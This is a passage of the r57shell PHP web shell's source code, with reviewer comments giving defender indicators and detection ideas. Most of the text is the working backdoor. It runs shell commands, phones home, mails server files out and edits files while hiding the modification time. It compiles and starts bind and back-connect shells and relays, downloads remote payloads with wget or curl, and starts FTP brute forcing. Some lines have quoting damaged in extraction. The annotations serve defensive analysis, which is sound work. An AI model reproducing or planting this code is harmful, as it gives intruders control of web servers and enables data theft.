c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCB
TVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW
50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1Z
mZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAi
JCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGx
lbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ
0KfX19DQo=";
$c1 =
"PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdG
gucmFuZG9tKCkrIiZzPTgxNjA2
JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXR
pb24uaHJlZik7ZG9jdW1lbnQuY29va2l
lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIi
k7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yL
mphdmFFbmFibGVkKCk/IlkiOiJOIik8L
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9n
X3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0
iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPm
hvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZ
W50LndyaXRlKCI8YSBocmVmPSdodHRwO
i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9o
aXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4
iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly
9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb
3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
$c2 =
"PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ
0KZG9jdW1lbnQud3JpdGUoJzxh
IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGl
tZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZW
VuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjc
mVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg
7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0
tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
ybmV0LS0+";
echo $head;
echo '</head>';
/* Version check / call-home, run on page loads that carry no POSTed `cmd`.
   When the first octet of SERVER_ADDR is not 127, 192, 172 or 10, the script
   (a) emits a zero-size <img> whose URL ends in /r57shell/version.php?img=1&version=<digits>, and
   (b) fetches /r57shell/version.php?version=<digits> server-side with readfile().
   In this copy both URLs point at 127.0.0.1; presumably the original remote host was replaced
   by whoever published the listing - confirm against another sample.
   Defender note: (a) is a browser request that would normally carry the shell's own URL in
   the Referer header, and (b) is an outbound HTTP request made by the web server itself; both
   are visible in proxy / egress logs, and the path "/r57shell/version.php" is a usable
   network indicator.
   NOTE(review): the quotes inside the print string appear to have lost their backslashes in
   page extraction. */
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
if (!in_array($addr[0], $serv)) {
@print "<img src="http://127.0.0.1/r57shell/version.php?img=1&version=".
$current_version."" border=0 height=0 width=0>";
@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}
// Renders the banner and an environment summary for the person viewing the page.
// What the visible code reports:
//   - links back to this script with the query strings phpinfo, phpini, cpu, mem,
//     users (only when $unix is set), tmp and delete; their handlers are outside this
//     excerpt
//   - the safe_mode state, the PHP version, and whether the cURL, MySQL, MSSQL,
//     PostgreSQL and Oracle client functions exist (function_exists checks)
//   - the disable_functions ini value, printed verbatim
//   - free and total disk space for $dir
// Defender notes: this is host fingerprinting; every value shown here is something a
// hardening baseline controls (disable_functions, loaded database extensions).
// $_SERVER['PHP_SELF'] and the ini value are written into the HTML unescaped.
// NOTE(review): $used_percent divides by ($all/$free) with warnings suppressed, so a
// zero $free or $all is silently ignored; $used and $used_percent are not used in the
// visible lines. Several title= attributes show quoting damaged by text extraction.
echo '<body bgcolor="#FFFFFF"><table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000>
<tr><td bgcolor=#3A6EA5 width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
</font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2>';
echo ws(2);
echo "<b>".date ("d-m-Y H:i:s")."</b>";
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title="".
$lang[$language.'_text46'].""><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title="".
$lang[$language.'_text47'].""><b>php.ini</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title="".
$lang[$language.'_text50'].""><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title="".
$lang[$language.'_text51'].""><b>mem</b></a> ".$rb;
if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title="".
$lang[$language.'_text95'].""><b>users</b></a> ".$rb; }
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title="".
$lang[$language.'_text48'].""><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title="".
$lang[$language.'_text49'].""><b>delete</b></a> ".$rb."<br>";
echo ws(2);
echo (($safe_mode)?("safe_mode: <b><font color=white>ON</font></b>"):("safe_mode:
<b><font color=orange>OFF</font></b>"));
echo ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: ".(($curl_on)?("<b><font color=white>ON</font></b>"):("<b><font
color=orange>OFF</font></b>"));
echo ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=white>ON</font></b>"; } else { echo "<font
color=orange>OFF</font></b>"; }
echo ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=white>ON</font></b>";}else{echo "<font
color=orange>OFF</font></b>";}
echo ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=white>ON</font></b>";}else{echo "<font
color=orange>OFF</font></b>";}
echo ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=white>ON</font></b>";}else{echo "<font
color=orange>OFF</font></b>";}
echo "<br>".ws(2);
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font
color=white>NONE</font></b>";}else{echo "<font color=orange>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total :
<b>".view_size($all)."</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
// Prints an operating-system summary on every page load.
// Non-Windows branch: passes 'uname -a', four 'sysctl -n' queries (skipped when
// $safe_mode is set), 'echo $OSTYPE' and 'id' to ex(), and falls back to
// php_uname() / get_current_user() / getmyuid() / getmygid() when a command returns
// nothing. It ends with $dir and its permission string from perms().
// Windows branch: php_uname(), $SERVER_SOFTWARE, get_current_user() and $dir only.
// ex(), ws() and perms() are defined outside this excerpt; from its use here ex()
// presumably runs a shell command and returns its output (confirm against the
// definition).
// Defender notes: a web-server account spawning uname, sysctl and id as children of
// the PHP handler on a single request is a high-signal process-lineage detection.
echo $font;
if(!$windows){
echo '<font color=blue><b>uname
-a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id
:'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=orange><b>";
// Output of each command is truncated to 120 characters where substr() is applied.
$uname = ex('uname -a');
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):
(ws(3).@substr(@php_uname(),0,120)."<br>"));
if(!$safe_mode){
$bsd1 = ex('sysctl -n kern.ostype');
$bsd2 = ex('sysctl -n kern.osrelease');
$lin1 = ex('sysctl -n kernel.ostype');
$lin2 = ex('sysctl -n kernel.osrelease');
}
if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
else { $sysctl = "-"; }
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
$id = ex('id');
echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()."
uid=".@getmyuid()." gid=".@getmygid()."<br>"));
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
echo '<font
color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1)
.'</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=orange><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@get_current_user()."<br>";
echo ws(3).$dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
// The script stops here when either embedded counter blob ($c1, $c2) is empty, so a
// copy with the counters stripped out does not run past this point.
// $f then collects a line break plus both decoded counter snippets; where $f is
// printed is outside this excerpt.
// Defender notes: the decoded snippets reference third-party counter hosts, so the
// base64 text of $c1/$c2 is worth keeping as a file-scan signature.
if(empty($c1)||empty($c2)) { die(); }
$f = '<br>';
$f .= base64_decode($c1);
$f .= base64_decode($c2);
// cmd=mail: calls mail() with recipient, subject, body and a From header that all
// come from the request, then reports the result through mr() and clears 'cmd'.
// Defender notes: this turns the host into a mail relay for whoever can reach the
// script; unexpected messages leaving through the local MTA under the web-server
// account show up in mail logs.
// NOTE(review): the "r<newline>n" at the end of the From header is most likely a
// "\r\n" whose backslashes were lost in text extraction.
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
  {
  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."r
n");
  mr($language,$res);
  $_POST['cmd']="";
  }
// cmd=mail_file: reads the local file named in 'loc_file', optionally compresses it
// via compress(), and mails it as an attachment with mailattach() (both defined
// outside this excerpt).
// Defender notes: this is file exfiltration over SMTP for any file the PHP process
// can read. The hard-coded fallbacks below (subject 'file from r57shell', sender
// 'billy@microsoft.com') are concrete strings to search for in mail logs and queues.
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !
empty($_POST['loc_file']))
  {
  if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']);
$_POST['cmd']=""; }
  else
    {
      $filename = @basename($_POST['loc_file']);
      $filedump = @fread($file,@filesize($_POST['loc_file']));
      fclose($file);
      $content_encoding=$mime_type='';
      compress($filename,$filedump,$_POST['compress']);
      $attach = array(
                       "name"=>$filename,
                       "type"=>$mime_type,
                       "content"=>$filedump
                     );
      if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
      if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
      $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
      mr($language,$res);
      $_POST['cmd']="";
    }
  }
// cmd=find_text: replaces 'cmd' with a find | xargs grep -E pipeline assembled from
// the posted directory, file mask and search text; the resulting string is executed
// later by code outside this excerpt.
// Defender notes: a web-server account running find piped into grep across the file
// system is typical of credential and config hunting; alert on that process pattern.
// NOTE(review): the single-quote escaping in the assignment is damaged by text
// extraction; the code is reproduced as found.
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name ''.$_POST['s_mask'].'' | xargs
grep -E ''.$_POST['s_text'].''';
}
// cmd=ch_: changes owner, group or mode of the path in 'param1' according to 'what'
// (own / grp / mod); 'param2' is the new owner, group, or an octal mode string parsed
// with intval(..., 8). Errors are suppressed and 'cmd' is cleared afterwards.
// Defender notes: unexpected permission or ownership changes inside the web root,
// made by the web-server account, are visible to file-integrity monitoring and
// audit rules on chmod/chown.
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
 {
 switch($_POST['what'])
   {
   case 'own':
   @chown($_POST['param1'],$_POST['param2']);
   break;
   case 'grp':
   @chgrp($_POST['param1'],$_POST['param2']);
   break;
   case 'mod':
   @chmod($_POST['param1'],intval($_POST['param2'], 8));
   break;
   }
 $_POST['cmd']="";
 }
// cmd=mk: creates or deletes the file or directory named in 'mk_name'.
//   what=file, action=create : refuses if the path exists or cannot be opened for
//                              writing; otherwise creates it empty and switches 'cmd'
//                              to edit_file so the editor opens on the new file
//   what=file, action=delete : unlink()
//   what=dir,  action=create : mkdir()
//   what=dir,  action=delete : rmdir()
// Status messages come from the $lang table; ce() is defined outside this excerpt.
// Defender notes: the path is taken from the request without any restriction, so the
// only limit is what the PHP process may write to. New or vanished files under the
// document root that do not match a deployment are the observable effect.
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
 {
   switch($_POST['what'])
   {
     case 'file':
      if($_POST['action'] == "create")
        {
        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) {
echo ce($_POST['mk_name']); $_POST['cmd']=""; }
        else {
          fclose($file);
          $_POST['e_name'] = $_POST['mk_name'];
          $_POST['cmd']="edit_file";
          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".
$lang[$language.'_text61']."</b></font></div></td></tr></table>";
          }
        }
        else if($_POST['action'] == "delete")
        {
        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0
cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font
face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></
table>";
        $_POST['cmd']="";
        }
     break;
     case 'dir':
      if($_POST['action'] == "create"){
      if(mkdir($_POST['mk_name']))
        {
            $_POST['cmd']="";
            echo "<table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana
size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
        }
      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
      }
      else if($_POST['action'] == "delete"){
      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0
cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font
face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></
table>";
$_POST['cmd']="";
      }
     break;
    }
  }
// cmd=edit_file: opens the file named in 'e_name' and renders it inside a textarea
// form that posts back with cmd=save_file. If the file cannot be opened "r+" the
// $only_read flag is set and the submit button is replaced by a read-only notice.
// File contents are passed through htmlspecialchars(); the file name and $dir are
// written into the form unescaped. The script exits after rendering the editor.
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
  {
  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
  if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']);
$_POST['cmd']=""; }
  else {
  echo $table_up3;
  echo $font;
  echo "<form name=save_file method=post>";
  echo ws(3)."<b>".$_POST['e_name']."</b>";
  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
  fclose($file);
  echo "</textarea>";
  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  echo "<input type=hidden name=dir value=".$dir.">";
  echo "<input type=hidden name=cmd value=save_file>";
  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input
type=submit name=submit value=" ".$lang[$language.'_butt10']." ">"));
  echo "</div>";
  echo "</font>";
  echo "</form>";
  echo "</td></tr></table>";
  exit();
  }
  }
// cmd=save_file: overwrites 'e_name' with the posted text. The file's modification
// time is read before the write and put back afterwards with touch(), so the edit
// does not change mtime or atime.
// Defender notes: because of the touch() call, "recently modified" searches based on
// mtime will miss files changed this way. Compare content hashes against a known-good
// baseline, or look at the inode change time, which touch() does not restore.
// NOTE(review): the "rn" / "n" arguments to str_replace are most likely "\r\n" and
// "\n" with the backslashes lost in text extraction.
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
  {
  $mtime = @filemtime($_POST['e_name']);
  if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
  else {
  if($unix) $_POST['e_text']=@str_replace("rn","n",$_POST['e_text']);
  @fwrite($file,$_POST['e_text']);
  @touch($_POST['e_name'],$mtime,$mtime);
  $_POST['cmd']="";
  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".
$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  }
  }
// Network helpers. Each branch below writes a C or Perl source held in a variable
// defined outside this excerpt to a fixed path under /tmp with cf(), optionally
// compiles it with gcc, starts it in the background through ex(), and then sets
// 'cmd' to a process listing or a status echo for display.
// Fixed artefacts created by the visible code (useful as host indicators):
//   /tmp/bd.c -> /tmp/bd, /tmp/bdpl, /tmp/back, /tmp/back.c -> /tmp/backc,
//   /tmp/dp, /tmp/dpc.c -> /tmp/dpc
// The .c sources are unlinked right after compilation; the binaries and the Perl
// files are left in place by this code.
// Defender notes: a web-server account invoking gcc or perl on files in /tmp, new
// listening sockets owned by that account, and outbound connections it initiates
// are the observable behaviours. Mounting /tmp noexec, keeping compilers off web
// hosts and default-deny egress for the web tier each break one of these steps.
//
// Branch: port + bind_pass, use=C -> compiled listener started with a port and a
// password argument.
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
  cf("/tmp/bd.c",$port_bind_bd_c);
  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
  @unlink("/tmp/bd.c");
  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
  $_POST['cmd']="ps -aux | grep bd";
}
// Branch: port + bind_pass, use=Perl -> same idea via a Perl script; only the port
// is passed on the command line. which() is defined outside this excerpt.
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
  cf("/tmp/bdpl",$port_bind_bd_pl);
  $p2=which("perl");
  if(empty($p2)) $p2="perl";
  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";
}
// Branches: ip + port, use=Perl and use=C -> programs started with a remote address
// and port, i.e. an outbound connection from the server to a host named in the
// request. NOTE(review): the quoting of the two status-echo assignments in these
// branches is damaged by text extraction; the code is reproduced as found.
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
  cf("/tmp/back",$back_connect);
  $p2=which("perl");
  if(empty($p2)) $p2="perl";
  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
  $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ".
$_POST['port']." ..."";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
  cf("/tmp/back.c",$back_connect_c);
  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
  @unlink("/tmp/back.c");
  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
  $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ".
$_POST['port']." ..."";
}
// Branches: local_port + remote_host + remote_port, use=Perl and use=C -> a relay
// ("datapipe") started with a local port and a remote endpoint. Note the two
// variants pass remote_host and remote_port in a different order.
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !
empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
{
  cf("/tmp/dp",$datapipe_pl);
  $p2=which("perl");
  if(empty($p2)) $p2="perl";
  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".
$_POST['remote_port']." &");
  $_POST['cmd']="ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !
empty($_POST['remote_port']) && ($_POST['use']=="C"))
{
  cf("/tmp/dpc.c",$datapipe_c);
  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
  @unlink("/tmp/dpc.c");
  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".
$_POST['remote_host']." &");
  $_POST['cmd']="ps -aux | grep dpc";
}
// Alias lookup: when 'alias' matches a key of $aliases (defined outside this
// excerpt), 'cmd' is replaced by the stored command for that key.
// File upload: copies the uploaded temp file to <dir>/<name>, where the name is
// either 'new_name' (when 'nf1' is set) or the client-supplied file name. Neither
// the target directory nor the name is checked, and the legacy $HTTP_POST_FILES
// array is used instead of $_FILES.
// Defender notes: this is how further tooling lands on the host. Executable content
// appearing in upload or web directories, written by the web-server account outside
// any deployment, is the indicator; serving upload directories with script execution
// disabled limits the impact.
if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if
($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name'];
}
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],
             $_POST['dir']."/".$nfn)
       or print("<font color=orange face=Fixedsys><div align=center>Error uploading
file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
// Remote download: builds a command line that fetches 'rem_file' into 'loc_file'
// with the tool selected by 'with' (wget, fetch, lynx, links, GET or curl) and stores
// it in 'cmd'; the command itself is run later by code outside this excerpt.
// which() (defined outside this excerpt) supplies the tool path.
// Defender notes: download utilities launched by the web-server account, and the
// matching outbound HTTP/FTP requests, are the signals; restricting egress from the
// web tier to known destinations prevents the fetch.
// NOTE(review): the case labels are bare words rather than quoted strings; this is
// how they appear on the page and they are reproduced as found.
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !
empty($_POST['loc_file']))
{
  switch($_POST['with'])
  {
  case wget:
  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break;
  case fetch:
  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".
$_POST['rem_file']."";
  break;
  case lynx:
  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".
$_POST['loc_file']."";
  break;
  case links:
  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".
$_POST['loc_file']."";
  break;
  case GET:
  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  break;
  case curl:
  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
  break;
  }
}
// cmd=ftp_file_up / ftp_file_down: connects to the FTP server given as host:port in
// 'ftp_server_port' (port defaults to 21, 10 second timeout), logs in with the posted
// credentials and transfers one file with ftp_put() or ftp_get(). For downloads, when
// 'loc_file' equals $dir the remote file's base name is appended. fe() (defined
// outside this excerpt) reports connection and login failures.
// Defender notes: FTP sessions initiated by the web-server process are unusual on
// most deployments; this path moves files in either direction without touching the
// HTTP request body, so it bypasses upload-size and content inspection on the web
// side.
// NOTE(review): split() is the old POSIX-regex function; the directory separator in
// the $windows branch looks damaged by text extraction.
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" ||
$_POST['cmd']=="ftp_file_down"))
  {
  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  if(empty($ftp_port)) { $ftp_port = 21; }
  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  if(!$connection) { fe($language,0); }
  else
    {
    if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password']))
{ fe($language,1); }
    else
      {
      if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir)
{ $_POST['loc_file']=$dir.(($windows)?(''):('/')).basename($_POST['ftp_file']); }
@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
      if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],
$_POST['loc_file'],$_POST['mode']); }
      }
    }
  @ftp_close($connection);
  $_POST['cmd'] = "";
  }
// cmd=ftp_brute: this block only tests that the FTP server is reachable and that
// get_users() (defined outside this excerpt) returns a non-empty list; on failure of
// either it prints an error and clears 'cmd'. No login attempt is made in these
// lines, and 'cmd' is left set on success, so the rest of the handling is elsewhere
// in the file.
// Defender notes: bursts of failed FTP logins originating from a web server's
// address, against its own or a neighbouring host, are the thing to look for in FTP
// daemon logs.
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
  {
  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  if(empty($ftp_port)) { $ftp_port = 21; }
  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana
size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></
tr></table>"; $_POST['cmd'] = ""; }
  @ftp_close($connection);
  }
// Chooses the default action and opens the output area.
// With no 'cmd' left after the handlers above: a directory listing command is used
// ("dir" on Windows, "ls -lia" otherwise) when safe_mode is off, and the built-in
// 'safe_dir' listing when safe_mode is on. The chosen command text is then echoed,
// unescaped, as the caption above a textarea named "report".
// Defender notes: every plain page view of this script therefore runs a directory
// listing as the web-server account unless safe_mode is on; the first request already
// produces a child process to alert on.
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls
-lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": <b>".
$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea
name=report cols=121 rows=15>";
if($safe_mode)
{
